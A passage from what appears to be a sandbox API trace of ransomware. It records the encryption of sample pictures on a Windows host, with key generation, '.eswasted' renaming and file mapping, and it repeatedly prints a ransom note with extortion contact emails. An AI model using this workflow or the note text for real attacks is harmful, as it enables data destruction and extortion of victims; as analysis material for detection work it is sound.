RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0097.575] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f0e0) returned 1 [0097.575] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0097.576] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.576] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f0e0) returned 1 [0097.577] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0097.577] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.586] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0097.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0097.587] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0097.587] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LaSnoJVW54r90Nq9IDl7K7RD5ff+GpCaJx2PPogyQaq2WKP2p62apZYNHyH0Udh/\r\nwofmIFCRMK4OEqj5w75sX8D1sIRacSIo9zpFVso/zFsdBQXCUncHsRYa9xN3/zl6\r\n56TSTQjEEF9S6eIQMaCmlpJmM92Eqwy9KMZW452BWa5jPEAYz6SxpNMw0AFzuQLt\r\nTuIVQ5e6PiLUBt96w/l2c93aCwmhpdgCysn2PRp4MrFoq5BJNjcM4pduqeuh+zI4\r\nmTjjq9f1JlObBGkP8IbTX5xXh5FCWykqQ+mnu6TpDDQF9jp3ETdFjMTscYWOQHzv\r\nEjl+ilV3P/aQJryirt1WkpsRV4YmI9M3f9ODHxB0y1MTrft7WgmcGbsvSfh6pgMz\r\nAqEUMqiQvtJ0LBSADf8Tdwo2ZaQfXXRCE6BdsQSSssSJy3ly6I0VAH6Osk6v9DHt\r\n7SkKqZZyVDT2HMES7kbs/VCkIkyXas1UKt6I8v7woKI94au/JP6aTQsJJPxZQyHr\r\n+UPy/webhucAyeblK6rcvqzV66H1r+WAfN0rQauyN++2lz6QzisAQaI3ecD4IHB+\r\n4Oga0zfmGO6ryEwWKJZjQLdqA4WoPcGeKLhYmJ2TQYRuCYoNfx32cd0VX+OmrX7K\r\nHjUfedbL7qBr+q4IqicQFyQ7sFtgYs8wD7B8henUyfv=[end_key]\r\nKEEP IT\r\n") returned 990 [0097.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0097.587] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0097.589] SetEndOfFile (hFile=0x108) returned 1 [0097.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0097.592] CloseHandle (hObject=0x108) returned 1 [0097.594] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0097.594] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x723fb8 | out: hHeap=0x6d0000) returned 1 [0097.594] _aulldvrm () returned 0x0 [0097.594] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f0e0) returned 1 [0097.595] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0097.595] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.595] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0097.595] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x276) returned 0x71ec18 [0097.595] lstrcpyW (in: lpString1=0x71ec84, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0097.595] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0097.595] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f0e0) returned 1 [0097.596] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0097.596] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0097.597] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0097.598] SetEndOfFile (hFile=0x108) returned 1 [0097.598] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0097.598] lstrcpyW (in: lpString1=0x71ec84, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0097.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.eswasted")) returned 1 [0097.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0097.599] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0097.599] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0xbea1f [0097.599] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbea1f) returned 0x1610000 [0097.599] CloseHandle (hObject=0x11c) returned 1 [0097.696] UnmapViewOfFile (lpBaseAddress=0x1610000) returned 1 [0097.701] CloseHandle (hObject=0x124) returned 1 [0097.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0097.701] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f0e0) returned 1 [0097.702] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0097.702] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.702] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f0e0) returned 1 [0097.703] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0097.703] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0097.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0097.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0097.716] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZEdtR41frY/L4gRsA0sE6eRAH23fpbzUTC79Yxy/o6o+s7kh65JMTfgRTrmbPjsR\r\nj1jVbJPF7zW7zdODeRCMEDgzhC5jy3KMxSGaks63YABFdnF6bvMybHT1mLJuWBGK\r\n/RvCqTrKcrGwxvhMJJ8WGS71a3fRQqsWrPIXfMQ+DhubSsdfzSXLhAgawWxLQJee\r\nslYUmgTqhVTY3OKLTjbo3ySXl3z56Qh3KGHwOUZdfezYs9YPu67iZ5g57FvuAvGq\r\n4kZfNPREAjWO4wa0+hBYRyVHWdLSwv7HlskkM+2MBxBxU/V61xNOJDk84T2rdJHG\r\nbyiIWvKHEBPVKlQ2Vt2emASD3Z2bFNMGe6m11Pd2gDHRLJLzHydk3m1r5Y5mAyul\r\ncHtV9ZLiUtF2sppiSLCXvR1225YHebtUaeG/QjIPH543SRQWUdVEZPynRWP9McoX\r\nHsKq8QuZsf6XKWt3leJujIqn50h3kpp7fxCsX2tfOtPJ6Vlhn+e7/5KfFFAehvlZ\r\nu/5BJInHpHQ/9LBOnmZR+gMPMSEr0d14pCNgmSEEJcDFojfGxMcyGm7QuUlw1QHS\r\n+LSakYhTyLwNxwt1iOgQfw4FHNZPm/nQjpyefuk86hgi868WrTkZOKOUJnj5XeR3\r\nAE3aGqQDFWBPQJyBGSqbt0dqgWKXSyBuV4QH6j2z78q=[end_key]\r\nKEEP IT\r\n") returned 990 [0097.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0097.716] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0097.716] SetEndOfFile (hFile=0x108) returned 1 [0097.719] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0097.719] CloseHandle (hObject=0x108) returned 1 [0097.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0097.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x727b30 | out: hHeap=0x6d0000) returned 1 [0097.721] _aulldvrm () returned 0x0 [0097.721] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f0e0) returned 1 [0097.722] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0097.722] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.722] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0097.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x71ec18 [0097.723] lstrcpyW (in: lpString1=0x71ec8e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0097.723] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0097.723] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f0e0) returned 1 [0097.724] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0097.724] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0097.724] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0097.830] SetEndOfFile (hFile=0x108) returned 1 [0097.830] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0097.830] lstrcpyW (in: lpString1=0x71ec8e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0097.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.eswasted")) returned 1 [0097.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0097.918] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0097.919] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x8907c [0097.919] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8907c) returned 0x16d0000 [0097.919] CloseHandle (hObject=0x10c) returned 1 [0098.044] UnmapViewOfFile (lpBaseAddress=0x16d0000) returned 1 [0098.048] CloseHandle (hObject=0x11c) returned 1 [0098.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0098.048] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f0e0) returned 1 [0098.049] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0098.049] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.050] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f0e0) returned 1 [0098.051] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0098.051] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.077] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0098.078] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0098.078] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0098.078] _snwprintf (in: _Dest=0x1312050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZV67ZE5X0vnol0+g5/cvzEZsOcML60vNgUupQ/dIf3mfF/sp8ghTF1MCJYp+ALtu\r\n49St5t0B2Of4KME4mhNOsnRl2/B11GjHv7u7DpKr0+kUiFNwA5bbysLYpb2AoUgv\r\n9sgrCfTk+5nd3axVtO2P75MqJ9DaBAYYVMc9x+++Da5Gmk2V6WS1OQwMi/rhteTj\r\n2GqQXxddhj+uUGHDU0pgX9pFdcr5qm138hHzoESeDg23hTqRXgzG4bwk/TxN6BRM\r\nQxJknFC3ohd4Xgw4YWrewpIYEFfDRZkLOarf/jCvG25e5m4voVTdAs1AJ67h7//O\r\nsnc46hoZ6a6wf4eEbcIahmWxHwui9iymQUo7ZpwC4D/mR9K6QR1sGwY+ebHMt0cB\r\n0XIXs+29JtuJq9eavwlUftvlUTbf8frFsKhvVv8WdJbVN2ghF7h/+HCp4fmuS94p\r\nbgWfaUr9THMzRdQm6R0qDEAVfaCvRXV+U73skwiijoVZovzG/nOVv9ekpJZI2SVg\r\niHg6LTea1bzM3J2Afp9cgNwNiABTuzekNkq3FXX6tovzM8PxNe4SOzq4cEOJUrKb\r\nunZOeER6UtipnG0aBKr1KUIRsp99j+VwoZ6rIS1YAqpdTLNiM4zI9qWQtU5sBWw0\r\n0tCHXylis0g5ZB5XzOI/5p75tKrwKdjI8NktSZqg3YS=[end_key]\r\nKEEP IT\r\n") returned 990 [0098.078] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0098.078] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0098.078] SetEndOfFile (hFile=0x108) returned 1 [0098.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0098.081] CloseHandle (hObject=0x108) returned 1 [0098.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0098.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x724158 | out: hHeap=0x6d0000) returned 1 [0098.085] _aulldvrm () returned 0x0 [0098.085] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f0e0) returned 1 [0098.086] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0098.086] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.086] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0098.086] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x278) returned 0x71ec18 [0098.086] lstrcpyW (in: lpString1=0x71ec86, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0098.086] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0098.086] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f0e0) returned 1 [0098.093] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0098.093] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0098.094] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0098.095] SetEndOfFile (hFile=0x108) returned 1 [0098.095] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.095] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0098.095] lstrcpyW (in: lpString1=0x71ec86, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0098.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.eswasted")) returned 1 [0098.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0098.097] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0098.097] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x97958 [0098.097] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x97958) returned 0x1610000 [0098.097] CloseHandle (hObject=0x11c) returned 1 [0098.149] UnmapViewOfFile (lpBaseAddress=0x1610000) returned 1 [0098.157] CloseHandle (hObject=0x124) returned 1 [0098.157] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0098.157] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f0e0) returned 1 [0098.158] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0098.159] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.159] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f0e0) returned 1 [0098.160] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0098.160] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.171] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0098.171] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0098.171] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0098.172] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 